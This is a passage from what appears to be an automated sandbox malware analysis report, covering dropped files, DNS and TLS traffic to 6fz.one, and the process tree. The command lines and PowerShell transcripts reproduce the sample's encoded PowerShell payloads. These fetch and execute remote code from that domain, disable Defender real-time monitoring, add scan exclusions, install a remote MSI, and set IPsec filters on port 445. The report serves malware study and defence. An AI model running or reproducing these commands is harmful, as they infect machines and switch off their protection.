C:\Users\user\AppData\Local\Temp\hjp55l32\hjp55l32.dll Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows Category: dropped Size (bytes): 3072 Entropy (8bit): 2.867930341093404 Encrypted: false SSDEEP: 24:etGSVmp2YYSeVx8jdg2kOWG8sgChwC4tkFVhjJv6lStI+ycuZhNndakSeyPNnq:6VNY28OLG8sjhRFVhtvnt1ulnda3eeq MD5: 4294A1E3E7F7BC241095D6D6FFE3A003 SHA1: 9D6A5D67E5EEDCEFE93B737A1264F89DA7DA86C5 SHA-256: 769F8D0900A2B96E23AB6027DC4B5DCC4F831AA8DC24003B976640DE58664457 SHA-512: CCD5544F9938B2785AB15AB501CF5EF131C94D4395EBD677F60F607DB75E03AB9D1011FE93E656B91E579E23194BFDED3A533458A7AD56AF96EB0A668F4B1335 Malicious: false Preview: MZ...... @...... !..L.!This program cannot be run in DOS mode....$...... PE..L.....$a...... !...... #...... @...... @...... h#..S....@...... `...... H...... text...... `.rsrc...... @...... @[email protected] oc...... `...... @..B...... BSJB...... v4.0.30319...... l...... #~...... 4...#Strings...... #US...... #GUID...... L...#Blob...... G...... %3...... 8.1...... ?...... Q...... b.....n.....z...... !...... $.....-.).....?...... Q...... (...... .hjp55l32.dll.P F88dNcdsDDqe7Zf.mscorlib.System.Object.MsiInstallProduct.MsiSetInternalUI.packag

C:\Users\user\AppData\Local\Temp\hjp55l32\hjp55l32.out Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File Type: ASCII text, with CRLF, CR line terminators Category: modified Size (bytes): 412 Entropy (8bit): 4.871364761010112 Encrypted: false SSDEEP: 12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH MD5: 83B3C9D9190CE2C57B83EEE13A9719DF SHA1: ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E SHA-256: B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA SHA-512: 0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FED B Malicious: false Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved...... This compiler is provided as part of the Mi crosoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# pro gramming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\Documents\20210824\PowerShell_transcript.061544.OIWNDrfK.20210824052843.txt Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators Category: dropped Size (bytes): 17279 Entropy (8bit): 5.408983345370473 Encrypted: false SSDEEP: 384:vNYCUradT/fCGZkUGYyxNYCUradT/fCGZkUGY3NYCUradT/fCGZkUGYuNYCUradR:LUYHCGIYoUYHCGIYzUYHCGIYcUYHCGIA MD5: 83FD51B1149F98A11FB029B564B0155E SHA1: CB54266422A028216C32DF8A2EF8B79FCBF1D7A6 SHA-256: BB36E28303D11875A6852F84D8133C7F5856528F49706F8DD45076D9614FD038 SHA-512: 6EE34766E572B7991999F1A544B783BE6428E69C1E784F62FAD0DF5C3CE63220174A683BAEE310D3C6EB496CC0F8D436E8611BA6675798A2598CE42A09AAA59A Malicious: false Yara Hits: Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Users\user\Documents\20210824\PowerShell_transcript.061544.OIWNDrfK.20210824052843.txt, Author: Florian Roth Preview: .**********************..Windows PowerShell transcript start..Start time: 20210824052855..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 061544 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass - EncodedCommand DQAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEQAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGk AdABvAHIAaQBuAGcAIAAkAHQAcgB1AGUADQAKAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuA FAAYQB0AGgAIAAiACQAZQBuAHYAOgB3AGkAbgBkAGkAcgAiAA0ACgAkAFIAZQBnAGsAZQB5AHAAYQB0AGgAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0A HcAYQByAGUAXAA3AC0AWgBpAHAAIgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQA KAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsAD QAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzA

Copyright Joe Security LLC 2021 Page 18 of 44 C:\Users\user\Documents\20210824\PowerShell_transcript.061544.hEH4MqJa.20210824053009.txt Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators Category: dropped Size (bytes): 780 Entropy (8bit): 5.255202910492213 Encrypted: false SSDEEP: 24:BxSA4kqPvN6x2DOXUWMa5WhHjeTKKjX4CIym1ZJXgTR:BZ4vN6oOEhqDYB1Z6 MD5: 4729DF34932C8014FC7E80B14FCE90CA SHA1: F005B6E8450AFB1FFC122F797EEAB6A21B39302E SHA-256: A80A355C2C06435E0220BB336AE85A70F471F486A574D851F5AEB1384856A0BD SHA-512: 0AA92F865BDF28DCFFBF1A279927350E593BE6C94D85BCC1DB1E560E4C1E64D3B27B7EA7763C9CABB1AD97694E2E5FE6F568717FB093A8EACB8158A7D610A ACC Malicious: false Preview: .**********************..Windows PowerShell transcript start..Start time: 20210824053010..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Co nfiguration Name: ..Machine: 061544 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Start-Sleep -Seconds 900; Restart-Computer -Force..Process ID: 6072..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1 ..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..************** ********..**********************..Command start time: 20210824053010..**********************..PS>Start-Sleep -Seconds 900; Restart-Computer -Force..

C:\Users\user\Documents\20210824\PowerShell_transcript.061544.nhqpSbF5.20210824052819.txt Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators Category: dropped Size (bytes): 1227 Entropy (8bit): 5.581746074953716 Encrypted: false SSDEEP: 24:BxSA4IIiDvBB6x2DOXiGf6kahJpQQ1fnJe2yGtcfPFWIHjeTKKjX4CIym1ZJXgIH:BZnI6v/6oOLikOJCQ1hByGtQPsIqDYBx MD5: 88EFDD1D2A0FA7D8DBD70A5F3EE7939C SHA1: 57ED8197E03D00422681DC34FBA7A071BC7B4E2A SHA-256: B948E1EDD1FF702F54B7153A4C6C2837B64DE64B436D2093F433D4106609B09E SHA-512: BAA59FB0F8A4947C498FC69CDBDD4AE06A7A29049C75ACF12345DC802EED75752350EA51BEF315ED4837E54C96C975B4FE32F2D8D7A2ADFD94CAADEAF884F 0BE Malicious: false Preview: .**********************..Windows PowerShell transcript start..Start time: 20210824052827..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 061544 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -nop -exec bypass -Encode DQAKAGYAbwByACgAJABpAD0A MQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKACQAYQA9ACcAaAB0AHQAcABzADoALwAvADYAZgB6AC4AbwBuAG UALwBkAC4AcABoAHAAPwBpAD0AMQAnADsAaQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAAp AC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJABhACkAOwBNAHMAaQBNAGEAawBlACAAKAAiACQAYQAiACsAJwA2ACcAKQA7AFMAdA BhAHIAdAAtAFMAbABlAGUAcAAgADMAMAANAAoAfQANAAoA..Process ID: 4996..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0 .1..**********************..************

\Device\ConDrv Process: C:\Windows\SysWOW64\cacls.exe File Type: ASCII text, with no line terminators Category: dropped Size (bytes): 16 Entropy (8bit): 3.452819531114783 Encrypted: false SSDEEP: 3:owt:owt MD5: AC529FE6926F414CA912E854913B37D5 SHA1: EE123DCE12545E4431912A4F5D280D498B173EA9 SHA-256: 7EF170D8E74624C85D940142192E015D2CC66F53A0BA0C605D884F5A515BBAAC SHA-512: 5C1640767913A90A230A1DB611214050A4F45667F731D97E0D6BCBB25AA526E809F75E1AF88E15314C4D91873C219EC955A540BFC0EBB6A3E94AAF75CAAA706D Malicious: false Preview: processed file:

Static File Info

No static file info

Copyright Joe Security LLC 2021 Page 19 of 44 Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class Aug 24, 2021 05:28:38.522350073 CEST 192.168.2.5 8.8.8.8 0xcfc1 Standard query 6fz.one A (IP address) IN (0x0001) (0) Aug 24, 2021 05:29:19.459856987 CEST 192.168.2.5 8.8.8.8 0x3b6 Standard query 6fz.one A (IP address) IN (0x0001) (0) Aug 24, 2021 05:29:22.633817911 CEST 192.168.2.5 8.8.8.8 0x7e3f Standard query 6fz.one A (IP address) IN (0x0001) (0)

DNS Answers

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class Aug 24, 2021 8.8.8.8 192.168.2.5 0xcfc1 No error (0) 6fz.one 104.21.0.250 A (IP address) IN (0x0001) 05:28:38.561306953 CEST Aug 24, 2021 8.8.8.8 192.168.2.5 0xcfc1 No error (0) 6fz.one 172.67.151.130 A (IP address) IN (0x0001) 05:28:38.561306953 CEST Aug 24, 2021 8.8.8.8 192.168.2.5 0x3b6 No error (0) 6fz.one 104.21.0.250 A (IP address) IN (0x0001) 05:29:19.494790077 CEST Aug 24, 2021 8.8.8.8 192.168.2.5 0x3b6 No error (0) 6fz.one 172.67.151.130 A (IP address) IN (0x0001) 05:29:19.494790077 CEST Aug 24, 2021 8.8.8.8 192.168.2.5 0x7e3f No error (0) 6fz.one 104.21.0.250 A (IP address) IN (0x0001) 05:29:22.673012018 CEST Aug 24, 2021 8.8.8.8 192.168.2.5 0x7e3f No error (0) 6fz.one 172.67.151.130 A (IP address) IN (0x0001) 05:29:22.673012018 CEST

HTTPS Packets

Source Dest Not Not JA3 SSL Client Timestamp Source IP Port Dest IP Port Subject Issuer Before After Fingerprint JA3 SSL Client Digest Aug 24, 2021 104.21.0.250 443 192.168.2.5 49681 CN=sni.cloudflaressl.com, CN=Cloudflare Inc Sun Aug Mon 769,49162-49161- 54328bd36c14bd82ddaa0 05:28:38.665327072 O="Cloudflare, Inc.", L=San ECC CA-3, 22 Aug 22 49172-49171-53- c04b25ed9ad CEST Francisco, ST=California, O="Cloudflare, Inc.", 02:00:00 01:59:59 47-10,0-10-11-35- C=US CN=Cloudflare Inc ECC C=US CN=Baltimore CEST CEST 23-65281,29-23- CA-3, O="Cloudflare, Inc.", CyberTrust Root, 2021 2022 24,0 C=US OU=CyberTrust, Mon Jan Wed O=Baltimore, C=IE 27 Jan 01 13:48:08 00:59:59 CET CET 2020 2025 CN=Cloudflare Inc ECC CA-3, CN=Baltimore Mon Jan Wed O="Cloudflare, Inc.", C=US CyberTrust Root, 27 Jan 01 OU=CyberTrust, 13:48:08 00:59:59 O=Baltimore, C=IE CET CET 2020 2025 Aug 24, 2021 104.21.0.250 443 192.168.2.5 49682 CN=sni.cloudflaressl.com, CN=Cloudflare Inc Sun Aug Mon 771,49196-49195- bd0bf25947d4a37404f042 05:29:19.541357040 O="Cloudflare, Inc.", L=San ECC CA-3, 22 Aug 22 49200-49199-159- 4edf4db9ad CEST Francisco, ST=California, O="Cloudflare, Inc.", 02:00:00 01:59:59 158-49188-49187- C=US CN=Cloudflare Inc ECC C=US CN=Baltimore CEST CEST 49192-49191- CA-3, O="Cloudflare, Inc.", CyberTrust Root, 2021 2022 49162-49161- C=US OU=CyberTrust, Mon Jan Wed 49172-49171-157- O=Baltimore, C=IE 27 Jan 01 156-61-60-53-47- 13:48:08 00:59:59 10,0-5-10-11-13- CET CET 35-16-23- 2020 2025 65281,29-23-24,0

Copyright Joe Security LLC 2021 Page 20 of 44 Source Dest Not Not JA3 SSL Client Timestamp Source IP Port Dest IP Port Subject Issuer Before After Fingerprint JA3 SSL Client Digest CN=Cloudflare Inc ECC CA-3, CN=Baltimore Mon Jan Wed O="Cloudflare, Inc.", C=US CyberTrust Root, 27 Jan 01 OU=CyberTrust, 13:48:08 00:59:59 O=Baltimore, C=IE CET CET 2020 2025 Aug 24, 2021 104.21.0.250 443 192.168.2.5 49683 CN=sni.cloudflaressl.com, CN=Cloudflare Inc Sun Aug Mon 771,49196-49195- bd0bf25947d4a37404f042 05:29:22.710908890 O="Cloudflare, Inc.", L=San ECC CA-3, 22 Aug 22 49200-49199-159- 4edf4db9ad CEST Francisco, ST=California, O="Cloudflare, Inc.", 02:00:00 01:59:59 158-49188-49187- C=US CN=Cloudflare Inc ECC C=US CN=Baltimore CEST CEST 49192-49191- CA-3, O="Cloudflare, Inc.", CyberTrust Root, 2021 2022 49162-49161- C=US OU=CyberTrust, Mon Jan Wed 49172-49171-157- O=Baltimore, C=IE 27 Jan 01 156-61-60-53-47- 13:48:08 00:59:59 10,0-5-10-11-13- CET CET 35-16-23- 2020 2025 65281,29-23-24,0 CN=Cloudflare Inc ECC CA-3, CN=Baltimore Mon Jan Wed O="Cloudflare, Inc.", C=US CyberTrust Root, 27 Jan 01 OU=CyberTrust, 13:48:08 00:59:59 O=Baltimore, C=IE CET CET 2020 2025

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: cmd.exe PID: 3208 Parent PID: 5092

General

Start time: 05:28:17 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\cmd.exe Wow64 process (32bit): true Commandline: cmd /C 'powershell.exe -nop -exec bypass -Encode DQAKAGYAbwByACgAJABpA D0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsAD QAKACQAYQA9ACcAaAB0AHQAcABzADoALwAvADYAZgB6AC4AbwBuAGUALwBkA C4AcABoAHAAPwBpAD0AMQAnADsAaQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAY wB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsA G8AYQBkAHMAdAByAGkAbgBnACgAJABhACkAOwBNAHMAaQBNAGEAawBlACAAK AAiACQAYQAiACsAJwA2ACcAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgA DMAMAANAAoAfQANAAoA' Imagebase: 0x150000 File size: 232960 bytes MD5 hash: F3BDBE3BB6F734E357235F4D5898582D Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

File Activities Show Windows behavior

Copyright Joe Security LLC 2021 Page 21 of 44 Analysis Process: conhost.exe PID: 4356 Parent PID: 3208

General

Start time: 05:28:17 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

Analysis Process: powershell.exe PID: 4996 Parent PID: 3208

General

Start time: 05:28:18 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): true Commandline: powershell.exe -nop -exec bypass -Encode DQAKAGYAbwByACgAJABpAD0AMQA7 ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKACQA YQA9ACcAaAB0AHQAcABzADoALwAvADYAZgB6AC4AbwBuAGUALwBkAC4AcABo AHAAPwBpAD0AMQAnADsAaQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAA bgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBk AHMAdAByAGkAbgBnACgAJABhACkAOwBNAHMAaQBNAGEAawBlACAAKAAiACQA YQAiACsAJwA2ACcAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADMAMAAN AAoAfQANAAoA Imagebase: 0x12f0000 File size: 430592 bytes MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10 Has elevated privileges: true Has administrator privileges: true Programmed in: .Net C# or VB.NET Yara matches: Rule: Invoke_PSImage, Description: Detects a command to execute PowerShell from String, Source: 00000002.00000002.508337108.0000000005057000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_PSImage, Description: Detects a command to execute PowerShell from String, Source: 00000002.00000002.508576402.00000000050EF000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_PSImage, Description: Detects a command to execute PowerShell from String, Source: 00000002.00000002.508214967.0000000005009000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_PSImage, Description: Detects a command to execute PowerShell from String, Source: 00000002.00000002.508316918.0000000005052000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_PSImage, Description: Detects a command to execute PowerShell from String, Source: 00000002.00000002.508383686.000000000506E000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_PSImage, Description: Detects a command to execute PowerShell from String, Source: 00000002.00000002.507742791.0000000004DF2000.00000004.00000001.sdmp, Author: Florian Roth Reputation: high

File Activities Show Windows behavior

File Created

File Deleted

Copyright Joe Security LLC 2021 Page 22 of 44 File Written

File Read

Registry Activities Show Windows behavior

Analysis Process: powershell.exe PID: 900 Parent PID: 4996

General

Start time: 05:28:40 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): true Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -exec bypass -E ncodedCommand DQAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAG UAIAAtAEQAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdA BvAHIAaQBuAGcAIAAkAHQAcgB1AGUADQAKAEEAZABkAC0ATQBwAFAAcgBlAG YAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIA AiACQAZQBuAHYAOgB3AGkAbgBkAGkAcgAiAA0ACgAkAFIAZQBnAGsAZQB5AH AAYQB0AGgAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXA A3AC0AWgBpAHAAIgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAE QAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQ BzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAG EAZwBuAG8AcwB0AGkAYwBzADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQ BtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAG MAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQ BzAHMAIABQAEYAOAA4AGQATgBjAGQAcwBEAEQAcQBlADcAWgBmAA0ACgB7AA 0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIALA AgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF 0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbg AgAGkAbgB0ACAATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0AC gAcwB0AHIAaQBuAGcAIABwAGEAYwBrAGEAZwBlAFAAYQB0AGgALAAgAHMAdA ByAGkAbgBnACAAYwBvAG0AbQBhAG4AZABMAGkAbgBlACkAOwANAAoAWwBEAG wAbABJAG0AcABvAHIAdAAoACIAbQBzAGkALgBkAGwAbAAiACkAXQANAAoAcA B1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAH QAIABNAHMAaQBTAGUAdABJAG4AdABlAHIAbgBhAGwAVQBJACgAaQBuAHQAIA BkAHcAVQBJAEwAZQB2AGUAbAAsACAASQBuAHQAUAB0AHIAIABwAGgAVwBuAG QAKQA7AA0ACgB9AA0ACgAiAEAADQAKAGQAbwANAAoAewANAAoAJABtAHMAaQ BwAGEAdABoAEEAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8ANgBmAHoALgBvAG 4AZQAvAGQALgBwAGgAcAA/AGkAPQAxADYAIgANAAoAJABtAHMAaQBwAGEAdA BoAEEATABMACAAPQAgAEAAKAAiACQAbQBzAGkAcABhAHQAaABBACIALAAiAC QAbQBzAGkAcABhAHQAaABBACIAKQANAAoAJABOAGQAUwBVAEkAdwB1AHUAVw BuAHAAWQBIAHoARgB1ACAAPQAgAGcAZQB0AC0AcgBhAG4AZABvAG0AIAAkAG 0AcwBpAHAAYQB0AGgAQQBMAEwAOwANAAoAWwBQAEYAOAA4AGQATgBjAGQAcw BEAEQAcQBlADcAWgBmAF0AOgA6AE0AcwBpAFMAZQB0AEkAbgB0AGUAcgBuAG EAbABVAEkAKAAyACwAMAApADsADQAKAFsAUABGADgAOABkAE4AYwBkAHMARA BEAHEAZQA3AFoAZgBdADoAOgBNAHMAaQBJAG4AcwB0AGEAbABsAFAAcgBvAG QAdQBjAHQAKAAiACQATgBkAFMAVQBJAHcAdQB1AFcAbgBwAFkASAB6AEYAdQ AiACwAIgAiACkADQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADYAMAANAA oAfQANAAoAdQBuAHQAaQBsACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcA BlAHIAdAB5ACAALQBQAGEAdABoACAAJABSAGUAZwBrAGUAeQBwAGEAdABoAC AALQBuAGEAbQBlACAAUwB0AGEAeQBPAG4AVABvAHAAKQANAAoA Imagebase: 0x12f0000 File size: 430592 bytes MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10 Has elevated privileges: true Has administrator privileges: true Programmed in: .Net C# or VB.NET Reputation: high

File Activities Show Windows behavior

File Created

File Deleted

File Written

File Read

Copyright Joe Security LLC 2021 Page 23 of 44 Analysis Process: csc.exe PID: 372 Parent PID: 900

General

Start time: 05:29:14 Start date: 24/08/2021 Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Wow64 process (32bit): true Commandline: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\us er\AppData\Local\Temp\hjp55l32\hjp55l32.cmdline' Imagebase: 0x2f0000 File size: 2170976 bytes MD5 hash: 350C52F71BDED7B99668585C15D70EEA Has elevated privileges: true Has administrator privileges: true Programmed in: .Net C# or VB.NET Reputation: moderate

File Activities Show Windows behavior

File Created

File Deleted

File Written

File Read

Analysis Process: cvtres.exe PID: 1496 Parent PID: 372

General

Start time: 05:29:16 Start date: 24/08/2021 Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Wow64 process (32bit): true Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACH INE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES2CD4.tmp' 'c:\Users\user\AppD ata\Local\Temp\hjp55l32\CSC19AB26A2AE5E4078BE27BAEBF17BEA80.TMP' Imagebase: 0x200000 File size: 43176 bytes MD5 hash: C09985AE74F0882F208D75DE27770DFA Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

File Activities Show Windows behavior

Analysis Process: msiexec.exe PID: 1064 Parent PID: 4552

General

Start time: 05:29:21 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\msiexec.exe Wow64 process (32bit): true Commandline: C:\Windows\syswow64\MsiExec.exe -Embedding B689D01F43C91B84ED8BE4676C8E722B

Copyright Joe Security LLC 2021 Page 24 of 44 Imagebase: 0xa40000 File size: 59904 bytes MD5 hash: 12C17B5A5C2A7B97342C362CA467E9A2 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

Analysis Process: msiexec.exe PID: 5248 Parent PID: 4552

General

Start time: 05:29:24 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\msiexec.exe Wow64 process (32bit): true Commandline: C:\Windows\syswow64\MsiExec.exe -Embedding 8A139D1F2E341CAE02DE3AE4A26DCC8A E Global\MSI0000 Imagebase: 0xa40000 File size: 59904 bytes MD5 hash: 12C17B5A5C2A7B97342C362CA467E9A2 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

File Activities Show Windows behavior

Registry Activities Show Windows behavior

Analysis Process: netsh.exe PID: 4860 Parent PID: 5248

General

Start time: 05:29:25 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' interface ipv6 install Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

Analysis Process: conhost.exe PID: 5144 Parent PID: 4860

General

Start time: 05:29:27 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes Copyright Joe Security LLC 2021 Page 25 of 44 MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

Analysis Process: netsh.exe PID: 1692 Parent PID: 5248

General

Start time: 05:29:28 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add policy name=qianye Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 2596 Parent PID: 1692

General

Start time: 05:29:28 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5744 Parent PID: 5248

General

Start time: 05:29:29 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filterlist name=Filter1 Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 5876 Parent PID: 5744

Copyright Joe Security LLC 2021 Page 26 of 44 General

Start time: 05:29:29 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5968 Parent PID: 5248

General

Start time: 05:29:30 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dst addr=Me dstport=445 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 6008 Parent PID: 5968

General

